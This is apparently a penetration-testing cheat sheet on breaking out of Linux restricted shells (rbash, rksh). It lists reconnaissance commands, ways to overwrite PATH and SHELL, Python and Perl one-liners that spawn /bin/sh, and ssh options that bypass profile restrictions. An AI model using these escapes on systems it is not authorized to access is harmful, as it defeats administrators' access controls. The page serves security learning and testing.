Escaping Restricted Shell

Some sysadmins don't want their users to have access to all commands. So they get a restriced shell. If the hacker get access to a user with a restriced shell we need to be able to break out of that, escape it, in order to have more power.

Many linux distros include rshell, which is a restriced shell.

To access the restried shell you can do this:

sh -r 
rsh

rbash
bash -r
bash --restricted

rksh
ksh -r

http://securebean.blogspot.cl/2014/05/escaping-restricted-shell_3.html?view=sidebar
http://pen-testing.sans.org/blog/pen-testing/2012/06/06/escaping-restricted-linux-shells

Breaking Out

Getting out of restricted shell

Reconnaissance

Find out information about the environment.

  • Run env to see exported environment variables
  • Run ‘export -p’ to see the exported variables in the shell. This would tell which variables are read-only. Most likely the PATH ($PATH) and SHELL ($SHELL) variables are ‘-rx’, which means we can execute them, but not write to them. If they are writeable, we would be able to escape the restricted shell!

  • If the SHELL variable is writeable, you can simply set it to your shell of choice (i.e. sh, bash, ksh, etc…).

  • If the PATH is writeable, then you’ll be able to set it to any directory you want. I recommend setting it to one that has commands vulnerable to shell escapes.

  • Try basic Unix commands and see what’s allowed ls, pwd, cd, env, set, export, vi, cp, mv etc.

Quick Wins

  • If ‘/’ is allowed in commands just run /bin/sh

  • If we can set PATH or SHELL variable

export PATH=/bin:/usr/bin:/sbin:$PATH
export SHELL=/bin/sh

or if chsh command is present just change the shell to /bin/bash

chsh
password: <password will be asked>
/bin/bash

If we can copy files into existing PATH, copy

cp /bin/sh /current/directory; sh

Taking help of binaries

Some commands let us execute other system commands, often bypassing shell restrictions

echo "Your evil code" | tee script.sh

Invoke shell thru scripting language

Python

python -c 'import os; os.system("/bin/bash")'

Perl

perl -e 'exec "/bin/sh";'

SSHing from outside

  • Use SSH on your machine to execute commands before the remote shell is loaded:
ssh username@IP -t "/bin/sh"
  • Start the remote shell without loading “rc” profile ( where most of the limitations are often configured)
ssh username@IP -t "bash --noprofile"

results matching ""

    No results matching ""